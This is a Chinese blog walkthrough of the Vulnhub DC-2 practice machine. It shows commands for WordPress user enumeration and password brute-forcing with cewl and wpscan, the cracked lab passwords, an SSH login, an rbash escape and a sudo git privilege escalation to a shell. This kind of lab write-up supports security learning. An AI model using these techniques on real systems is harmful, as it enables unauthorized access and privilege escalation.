DC-2靶机

于 2024-08-08 20:41:04 发布
阅读量161 收藏 2
点赞数 1
文章标签: 服务器 web安全 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/141035932
版权

信息收集

1.查看靶机mac地址并修改它的网络连接模式

2.主机发现

3.端口扫描

4.访问80端口

5.发现他出现一个域名,hosts文件绑定

6.重新访问

7.访问成功,查看主页上信息发现flag

8.发现是wordpress cms

9.whatweb 扫描

10.目录扫描

11.拼接/wp-admin

12.使⽤wpscan⼯具枚举⽤户

13.发现了三个相关的用户名admin,jerry,tom 接下来就是密码,使用了Cewl工具

cewl http://dc-2/ > 1.txt

14.破解密码

wpscan --url http://dc-2 --passwords 1.txt

15.获得账户密码

Username: jerry, Password: adipiscing Username: tom, Password: parturient

16.进行登录

17.发现第二个flag

18.根据提示连接ssh

ssh tom@192.168.42.190 -p 7744
parturient

19.成功连接

提权

1.查看权限

2.发现有限制。有一些命令不能使用,发现echo命令export命令可以使用,使用echo命令查看一下系统命令还有啥能用。

echo $PATH
echo /home/tom/usr/bin/*

3.使用上图命令进行绕过

# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a 
 
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

4.发现可以执行命令了,查看目录

5.根据提示切换jerry用户并查找flag文件

find / -name *flag*

6.发现了falg4.txt,打开查看(在/home/jerry/)

7.使用sudo提权

8.使用辅助网址(git | GTFOBins

9.输入

sudo git -p help config
!/bin/sh

10.发现成功提权

左提溜
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-2靶机渗透
weixin_45349299的博客
01-02 672
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
DC-2靶机详解
苏生要努力
03-03 1342
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机攻略
weixin_43179779的博客
10-16 1822
DC-2靶机攻略
DC-2靶机进行渗透测试
zll___的博客
03-11 765
DC-2靶机进行渗透测试
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2753
DC-2靶机渗透测试思路及流程
dc-2 靶机渗透学习
..
03-15 1319
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1427
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 901
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 522
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
测试面试宝典(四十五)—— 怎么定位bug是APP端还是服务器端的问题?
zhanghaiou07657的博客
08-02 568
如果在不同的 APP 端环境下都出现问题,可能是服务器端的问题;反之,则可能是 APP 端与特定环境不兼容。例如,在多款不同型号的手机上都出现相同的数据错误,更倾向于服务器端返回的数据有问题;如果其他类似功能正常,而只有某个特定功能出错,可能是该功能在 APP 端或服务器端的实现存在问题。例如,在稳定的 WiFi 环境中,APP 频繁闪退,大概率是 APP 自身的稳定性问题;比如,同一 APP 中,登录功能正常,而注册功能出错,需要分别检查 APP 端的注册逻辑和服务器端对注册请求的处理。
Socket如何实现客户端和服务器间的通信
weixin_64618449的博客
08-04 345
Socket 是实现网络通信的一种机制,它允许在不同主机之间的进程通过网络进行数据交换。下面我将简要介绍如何使用 Socket 实现客户端和服务器间的通信。
NTP时钟同步服务器_ntp时间服务器-京准
NTP授时服务器
08-07 391
NTP时钟同步服务器_ntp时间服务器-京准
服务器 Linux 的网络信息
最新发布
人在江湖飘,哪能不挨刀
08-07 566
博主上回大致讲解了文件系统,今天来说说 Linux 的网络信息,还是比较重要的~
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值